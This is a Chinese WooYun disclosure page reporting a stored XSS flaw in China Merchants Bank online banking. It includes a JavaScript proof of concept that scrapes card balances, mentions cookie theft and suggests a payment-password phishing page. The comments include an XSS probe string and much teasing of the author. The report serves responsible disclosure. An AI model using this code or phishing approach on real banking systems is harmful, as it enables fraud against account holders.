当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-070306

漏洞标题:招商银行网银定向xss通杀网页、PC端及手机APP(可定向窃取信息钓鱼种马)

相关厂商:招商银行

漏洞作者: 肉肉

提交时间:2014-07-30 15:30

修复时间:2014-09-13 15:34

公开时间:2014-09-13 15:34

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-07-30: 细节已通知厂商并且等待厂商处理中
2014-07-30: 厂商已经确认,细节仅向厂商公开
2014-08-09: 细节向核心白帽子及相关领域专家公开
2014-08-19: 细节向普通白帽子公开
2014-08-29: 细节向实习白帽子公开
2014-09-13: 细节向公众公开

简要描述:

招商银行网银某处存储型xss,网页版,PC客户端,手机客户端均受影响。不敢用网银了T_T

详细说明:

以下是用客户端做的测试
招商银行网银自助转账的留言处存在存储型xss,

1.png


查询交易记录的时候触发

QQ截图20140730135950.png


可加载执行外部js,
利用xss平台获取cookie

QQ截图20140730143642.png


这里还找piaca帮忙写了一个获取余额的poc

xmlhttp = new ActiveXObject("Msxml2.XMLHTTP.3.0");
function getBalance(cardNo, clientNo){
    var url = "/CmbBank_PB/UI/PBPC/DebitCard_CustomerService/cs_HomePageAnalyzer.aspx";
    var postData = "Params=%253CAccountUID%253E" + cardNo + "%253C%252FAccountUID%253E&CardIndex=1&ClientNo=" + clientNo + "&PRID=GetBalanceXmlCmbBank&HASH=0.5168066995926853"
    xmlhttp.Open("POST", url, false);
    xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    xmlhttp.send(postData);
    return xmlhttp.responseText;
}
window.onload = function(){
    var clientNo = document.getElementById("ClientNo").value;
    var cards = "";
	
    try{
        var card = document.getElementById("ddlDebitCardList").getElementsByTagName("option");
        var cardLength = card.length;
        for(var i=0;i<cardLength;i++){
            var resp = getBalance(card[i].value, clientNo);
            var balance = resp.match(/<HQYE>(.*?)<\/HQYE>/)[1];
            cards = cards + card[i].value + "=" + balance + "|";
        }
    }catch(e){}
    
    alert(cards);
}


QQ截图20140730143121.png


因为转账需要支付密码所以没办法直接转账,不过可利用此xss做一个钓鱼页面先获取支付密码再进行转账操作也是可行的。
在这样的页面下让输入银行卡支付密码了别说是没有安全意识的人了,就算是有安全意识的人估计会中招的也不会少,所以危害还是挺大的。
经测试招行网银网页版和手机客户端均存在这样的问题

漏洞证明:

QQ截图20140730135950.png


QQ截图20140730143642.png


快一点修复吧,现在每次打开网银都弹啊弹,好伤心啊
另外,建议对其他地方也做检测一下

修复方案:

过滤啊

版权声明:转载请注明来源 肉肉@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-07-30 21:27

厂商回复:

谢谢对招商银行安全的关注

最新状态:

2014-07-30:已处理完毕

2014-07-31:相关漏洞已由7月30号晚8点左右已修复完毕。

漏洞评价:

评论

  1. 2014-07-30 15:31 | ( 普通白帽子 | Rank:1207 漏洞数:104 | 传闻中魇是一个惊世奇男子,但是除了他华...)

    今天是什么日子?

  2. 2014-07-30 15:31 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    肉肉?!

  3. 2014-07-30 15:32 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    @@! 肉肉

  4. 2014-07-30 15:32 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    肉肉发力了

  5. 2014-07-30 15:33 | xy小雨 ( 普通白帽子 | Rank:171 漏洞数:50 | 成为海贼王的男人)

    -。-

  6. 2014-07-30 15:34 | 李旭敏 ( 普通白帽子 | Rank:469 漏洞数:71 | ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎...)

    么么哒···

  7. 2014-07-30 15:34 | Focusstart ( 普通白帽子 | Rank:574 漏洞数:163 | 努力让某某某成为最幸福的女人!)

    肉肉给力~

  8. 2014-07-30 15:35 | redrain有节操 ( 普通白帽子 | Rank:183 漏洞数:26 | ztz这下子有165了!>_<'/&\)

    健健你那么能x你男朋友知道么

  9. 2014-07-30 15:35 | EvilMoon ( 路人 | Rank:1 漏洞数:1 | EM@Light4Freedom)

    健健你那么能x你男朋友知道么

  10. 2014-07-30 15:36 | saline ( 普通白帽子 | Rank:231 漏洞数:32 | Focus On Web Secur1ty)

    健健你那么能x你男朋友知道么

  11. 2014-07-30 15:38 | roker ( 普通白帽子 | Rank:357 漏洞数:108 )

    肉肉~~

  12. 2014-07-30 15:40 | B1acken ( 普通白帽子 | Rank:174 漏洞数:56 | 渣渣)

    @肉肉

  13. 2014-07-30 15:40 | 1fn0 ( 路人 | Rank:21 漏洞数:7 | 我是运维 不要开除我)

    肉肉~~~

  14. 2014-07-30 15:41 | onlycjeg ( 实习白帽子 | Rank:38 漏洞数:5 | 我就看看,我不说话.)

    @肉肉这么狠。

  15. 2014-07-30 15:42 | JinGuiZi ( 路人 | Rank:30 漏洞数:6 | 。。)

    健健你那么能x你男朋友知道么

  16. 2014-07-30 15:43 | 从容 ( 普通白帽子 | Rank:221 漏洞数:75 | Enjoy Hacking Just Because It's Fun :) ...)

    你关注的白帽子 肉肉 发表了漏洞 招商银行网银存储型xss(通杀网页、PC端及手机APP)

  17. 2014-07-30 15:43 | Focusstart ( 普通白帽子 | Rank:574 漏洞数:163 | 努力让某某某成为最幸福的女人!)

    加精了!!!!!肉肉好厉害!!!@肉肉

  18. 2014-07-30 15:47 | 计算姬 ( 普通白帽子 | Rank:398 漏洞数:90 | 看我看我看我啊)

    这是真肉肉么

  19. 2014-07-30 15:48 | 爱上平顶山 认证白帽子 ( 核心白帽子 | Rank:2738 漏洞数:547 | [不戴帽子]异乡过客.曾就职于天朝某机构.IT...)

    肉肉好厉害! 这么厉害 能嫁出去吗?

  20. 2014-07-30 15:49 | 假马 ( 普通白帽子 | Rank:142 漏洞数:18 | 我存在,你婶婶的脑海里.)

  21. 2014-07-30 15:50 | 只发通用型 ( 实习白帽子 | Rank:93 漏洞数:14 | 刷通用型奖金小号)

    0.0 肉肉发漏洞了 还被雷劈了你这么屌你妈知道吗

  22. 2014-07-30 15:51 | abcdlzy ( 实习白帽子 | Rank:79 漏洞数:14 | 好好学习,天天向上。)

    打雷啦。。。占座啦,前排卖瓜子,花生米~

  23. 2014-07-30 15:51 | 从容 ( 普通白帽子 | Rank:221 漏洞数:75 | Enjoy Hacking Just Because It's Fun :) ...)

    @爱上平顶山 估计嫁不出去,谁能降得住?

  24. 2014-07-30 15:54 | 浮萍 ( 普通白帽子 | Rank:555 漏洞数:118 | 默默潜水)

    竟然是肉肉发的

  25. 2014-07-30 15:55 | M4sk ( 普通白帽子 | Rank:1199 漏洞数:319 | 国内信息安全任重而道远,还需要厂商和白帽...)

    肉肉好厉害! 这么厉害 能嫁出去吗?

  26. 2014-07-30 15:58 | adm1n ( 普通白帽子 | Rank:216 漏洞数:66 | 只是一个渣渣而已。。。)

    来顶肉球

  27. 2014-07-30 15:59 | 小威 ( 普通白帽子 | Rank:492 漏洞数:76 | 活到老,学到老!)

    漏漏你这么猛显然是嫁不出去的节奏啊

  28. 2014-07-30 16:00 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)

    @从容 估计嫁不出去,谁能降得住?

  29. 2014-07-30 16:01 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    肉肉有精华了!

  30. 2014-07-30 16:10 | dangge ( 路人 | Rank:1 漏洞数:1 | 菜鸟一枚 努力学习中。)

    肉肉居然没有挂一个征婚的弹窗 真是浪费

  31. 2014-07-30 16:10 | 柠檬菜 ( 路人 | Rank:0 漏洞数:1 | 新手一枚)

    围观一下!牛逼了

  32. 2014-07-30 16:11 | 从容 ( 普通白帽子 | Rank:221 漏洞数:75 | Enjoy Hacking Just Because It's Fun :) ...)

    @京东商城 我擦,厂商都来了

  33. 2014-07-30 16:12 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @京东商城 咳咳,厂商注意形象啊,忘记换号了?

  34. 2014-07-30 16:12 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)

    厂商忘记换号了..

  35. 2014-07-30 16:13 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)

    我擦。。。。京东的也来了。。牛逼。。肉肉你赢了

  36. 2014-07-30 16:13 | Mosuan ( 普通白帽子 | Rank:449 漏洞数:175 | 尘封此号,不装逼了,再见孩子们。by Mosua...)

    @疯狗 我日.....让厂商玩一会吧.....

  37. 2014-07-30 16:13 | DeLETe ( 路人 | Rank:26 漏洞数:3 | 好烦。。)

  38. 2014-07-30 16:14 | zph ( 普通白帽子 | Rank:235 漏洞数:43 )

    这是要火的节奏……

  39. 2014-07-30 16:14 | 黑色的屌丝 ( 路人 | Rank:27 漏洞数:5 | →_→→_→)

    @肉肉 你还能嫁得出去吗?

  40. 2014-07-30 16:18 | 疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)

    相守妹子 @京东商城 忘记换号了? 健健你那么能x你男朋友知道么

  41. 2014-07-30 16:23 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    还想嫁出去吗?

  42. 2014-07-30 16:26 | Mr.leo ( 普通白帽子 | Rank:1314 漏洞数:176 | 说点神马呢!!)

    还想嫁出去吗?

  43. 2014-07-30 16:26 | 带馅儿馒头 ( 普通白帽子 | Rank:1278 漏洞数:143 | 心在,梦在)

    我靠!

  44. 2014-07-30 16:31 | 动后河 ( 实习白帽子 | Rank:51 漏洞数:13 | ☭)

    肉肉大妹子原来这么厉害

  45. 2014-07-30 16:36 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    你们都闪开,让我来

  46. 2014-07-30 16:40 | Draycen ( 路人 | Rank:0 漏洞数:1 )

    咳咳···

  47. 2014-07-30 16:49 | 冷静 ( 路人 | Rank:3 漏洞数:2 )

    统统闪开,让我去泡揉揉妹子

  48. 2014-07-30 16:50 | 嘿ME ( 实习白帽子 | Rank:50 漏洞数:6 | http://zhangtory.com)

    还想嫁出去吗?

  49. 2014-07-30 16:57 | pojo ( 实习白帽子 | Rank:31 漏洞数:7 )

    这种事情打死我都不信的说

  50. 2014-07-30 17:03 | AppLeU0 ( 路人 | 还没有发布任何漏洞 | 代码审计入门)

    健健你那么能x你男朋友知道么

  51. 2014-07-30 17:12 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    漏漏···

  52. 2014-07-30 17:15 | 摩西 ( 路人 | Rank:1 漏洞数:1 | 码农..)

    碉堡了~ 马克

  53. 2014-07-30 17:17 | xyang ( 普通白帽子 | Rank:242 漏洞数:51 | stay hungry stay foolish)

    肉肉厉害

  54. 2014-07-30 17:19 | 安然意境 ( 普通白帽子 | Rank:189 漏洞数:79 | 无论是你的事业还是你的个人,可能走的过程...)

    肉肉好厉害! 这么厉害 能嫁出去吗?

  55. 2014-07-30 17:20 | Mody ( 普通白帽子 | Rank:110 漏洞数:27 | "><img src=x onerror=alert(1);> <img s...)

    腻害

  56. 2014-07-30 17:22 | s0mun5 认证白帽子 ( 普通白帽子 | Rank:493 漏洞数:24 | .)

    带我飞

  57. 2014-07-30 17:26 | 漏漏 ( 路人 | Rank:2 漏洞数:1 | .............)

    不是我发的呀@肉肉

  58. 2014-07-30 17:54 | 命运 ( 路人 | Rank:2 漏洞数:1 | 我是来乌云秀智商下限的~~)

    刚看的时候我震惊了,回过神来发现..也没多大问题...

  59. 2014-07-30 17:57 | 铁蛋火车侠 ( 普通白帽子 | Rank:156 漏洞数:31 | Q群371620085 技术交流群 有漂亮妹纸!)

    德玛西亚!

  60. 2014-07-30 18:23 | 小川 认证白帽子 ( 核心白帽子 | Rank:1344 漏洞数:216 | 一个致力要将乌云变成搞笑论坛的男人)

    和肉肉有了触电的感觉

  61. 2014-07-30 18:24 | 天地不仁 以万物为刍狗 ( 普通白帽子 | Rank:977 漏洞数:264 | 天地本不仁 万物为刍狗)

    这里好热闹。。。。插一个。。。

  62. 2014-07-30 18:37 | ghy459 ( 实习白帽子 | Rank:62 漏洞数:5 | 深挖洞,广积shell。)

    肉肉好腻害,要火 ~

  63. 2014-07-30 19:13 | 果冻好吃 ( 路人 | Rank:22 漏洞数:11 | 大学通知书下来那天,我迫不及待的用四百块...)

    这结实的肉与肉的触感!看毛,你还是没男朋友!!!去百合网吧 哈哈

  64. 2014-07-30 19:26 | Jack.Chalres ( 实习白帽子 | Rank:39 漏洞数:15 | ..............)

    mark

  65. 2014-07-30 19:52 | 肉肉 认证白帽子 ( 普通白帽子 | Rank:112 漏洞数:10 | 肉肉在长亭科技,肉肉在长亭科技,肉肉在长...)

    怎么这么多人回复了。。。你们怎么可以这样怀疑我,我是一定嫁得出去的好么。其实漏洞技术含量也不是很高啦,运气好啦

  66. 2014-07-30 19:55 | 动后河 ( 实习白帽子 | Rank:51 漏洞数:13 | ☭)

    @肉肉 揉揉肉肉~

  67. 2014-07-30 19:57 | 夏殇 ( 路人 | Rank:30 漏洞数:21 | 不忘初心,方得始终。)

    肉肉好厉害! 这么厉害 能嫁出去吗?

  68. 2014-07-30 20:09 | 铁蛋火车侠 ( 普通白帽子 | Rank:156 漏洞数:31 | Q群371620085 技术交流群 有漂亮妹纸!)

    @天地不仁 以万物为刍狗 诛仙看多了.....

  69. 2014-07-30 21:28 | hacker@sina.cn ( 普通白帽子 | Rank:288 漏洞数:27 | ANONYMOUS)

    @肉肉 当事人说一定的事一般都不准 :D

  70. 2014-07-30 22:02 | y.z ( 路人 | Rank:2 漏洞数:3 | 初来咋到)

    @肉肉 再也嫁不出去了的预感。。。

  71. 2014-07-30 22:22 | 园长 ( 普通白帽子 | Rank:134 漏洞数:14 | 你在身边就是缘,缘分写在数据库里面。)

    我看见肉肉x的,已举报。

  72. 2014-07-30 22:23 | 小怿 ( 路人 | Rank:29 漏洞数:6 | )

    肉肉啊,你真能嫁出去吗?哎!估计没人敢娶你!曾经的曾经,看到一个笑话,说是给老婆的银行卡打去钱,然后说,你随意买,其实不然。。他的老公已经把DNS什么的改成自己的了,然后钱自然而然回了他老公的手,然后在对他老婆说,没事,不就钱吗,我在打给你点!而如果是你,会说。。你能糊弄了我?我看透你了!分手!

  73. 2014-07-30 22:47 | 微拍(乌云厂商)

    肉肉女神出大招

  74. 2014-07-30 22:47 | 秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚,关注互联网安全)

    NB!

  75. 2014-07-30 23:26 | aaaaty ( 实习白帽子 | Rank:83 漏洞数:28 | 爱情就像,我问服务器whoami,它说root)

    肉肉~~~

  76. 2014-07-30 23:33 | xiaoL ( 普通白帽子 | Rank:361 漏洞数:67 | PKAV技术宅社区!Blog:http://www.xlixli....)

    肉肉好节奏!

  77. 2014-07-31 07:54 | 小怿 ( 路人 | Rank:29 漏洞数:6 | )

    @微拍 你这名字凑什么热闹!!我还以为你们是搞拍卖的!!还特意看了一下百度百科!!竟然是录像软件!!我以为你要给肉肉出主意发大招呢!!

  78. 2014-07-31 09:26 | 开心一下1313 ( 实习白帽子 | Rank:63 漏洞数:20 | 喝口水,压压惊......)

    肉肉一出手,大家就挥手!

  79. 2014-07-31 09:28 | zph ( 普通白帽子 | Rank:235 漏洞数:43 )

    @小怿 loled!

  80. 2014-07-31 10:27 | hkAssassin ( 普通白帽子 | Rank:358 漏洞数:66 | 我是一只毛毛虫。)

    你们这帮坏人,不要调戏肉肉。

  81. 2014-07-31 10:51 | wcl17 ( 路人 | Rank:10 漏洞数:2 | 业余找漏洞的。。。)

    你们都是坏银

  82. 2014-07-31 13:28 | 小火苗 ( 路人 | Rank:6 漏洞数:1 | 我是一只小火苗呀,春风吹又生呀...)

    我卡里的五毛钱是不是被你转走了?我报警了。@肥肉

  83. 2014-07-31 19:32 | 猫友 ( 路人 | Rank:0 漏洞数:2 | 毕业于中国人民公安大学,现为某市公安特警...)

    肉肉~

  84. 2014-07-31 19:34 | 猫友 ( 路人 | Rank:0 漏洞数:2 | 毕业于中国人民公安大学,现为某市公安特警...)

    招商银行一共两个洞 @mango @肉肉

  85. 2014-07-31 23:56 | 无敌L.t.H ( 路人 | Rank:21 漏洞数:4 | ‮……肉肉捉活,亭长放解)

    警告:黄易小编、渣浪小编、馊狐小编、企鹅小编、〇民网小编正在赶来!肉登·皮尔斯使用了大停电。肉登·皮尔斯嗑了一片中二药。啪,爆头干掉黄易小编。啪,爆头干掉渣浪小编。啪,爆头干掉馊狐小编。啪啪啪啪啪,撂倒企鹅小编。〇民网小编呼叫增援。肉登·皮尔斯使用了干扰通讯。干扰通讯没有成功,增援来到,肉登·皮尔斯被啪啪啪干掉了。以上故事告诉了我们一个4G和伪基站不得不说的故事……

  86. 2014-08-01 19:08 | 猫友 ( 路人 | Rank:0 漏洞数:2 | 毕业于中国人民公安大学,现为某市公安特警...)

    【乌云曝招商银行网银存在漏洞 】http://news.html5tricks.com/wuyun-cmb-bugs.html

  87. 2014-08-02 10:34 | 浑水 ( 路人 | Rank:0 漏洞数:1 | 学习)

    肉肉厉害

  88. 2014-08-12 19:55 | 随时回来 ( 实习白帽子 | Rank:41 漏洞数:11 | 今年收成不好,喂的猪一点都没长,明早还得...)

    @肉肉 说好的 我的周一的WB呢 就是QQ上找你 说别人点感谢 没收到的

  89. 2014-08-13 10:48 | 肉肉 认证白帽子 ( 普通白帽子 | Rank:112 漏洞数:10 | 肉肉在长亭科技,肉肉在长亭科技,肉肉在长...)

    @随时回来 私信我或者qq上找一下小秘书2928983512

  90. 2014-08-20 11:00 | xiaoL ( 普通白帽子 | Rank:361 漏洞数:67 | PKAV技术宅社区!Blog:http://www.xlixli....)

    土豪都是拿RMB在测试的- -

  91. 2014-09-13 21:28 | 从容 ( 普通白帽子 | Rank:221 漏洞数:75 | Enjoy Hacking Just Because It's Fun :) ...)

    公开了,好思路……

  92. 2014-11-25 15:22 | wcl17 ( 路人 | Rank:10 漏洞数:2 | 业余找漏洞的。。。)

    修复方案不应该是“过滤”,应该是“转义”。过滤害死的人无数~~~

  93. 2014-12-31 20:13 | 肉肉 认证白帽子 ( 普通白帽子 | Rank:112 漏洞数:10 | 肉肉在长亭科技,肉肉在长亭科技,肉肉在长...)

    @wcl17 然后他们真的是过滤了,囧

  94. 2014-12-31 22:01 | 雅柏菲卡 ( 普通白帽子 | Rank:1213 漏洞数:234 | 雙魚座聖鬥士雅柏菲卡)

    @微拍 我可以用力拍你吗

  95. 2015-02-25 11:42 | wcl17 ( 路人 | Rank:10 漏洞数:2 | 业余找漏洞的。。。)

    @肉肉 那就可以继续挖这个漏洞了。。。

  96. 2015-02-28 10:20 | 肉肉 认证白帽子 ( 普通白帽子 | Rank:112 漏洞数:10 | 肉肉在长亭科技,肉肉在长亭科技,肉肉在长...)

    @wcl17 然后我提醒他们了,我是个好人

  97. 2015-03-08 19:20 | 明月影 ( 路人 | Rank:12 漏洞数:8 | 学姿势,学思路。)

    肉肉现在都不敢挖洞了。

  98. 2015-08-03 22:14 | wcl17 ( 路人 | Rank:10 漏洞数:2 | 业余找漏洞的。。。)

    @肉肉 赞~~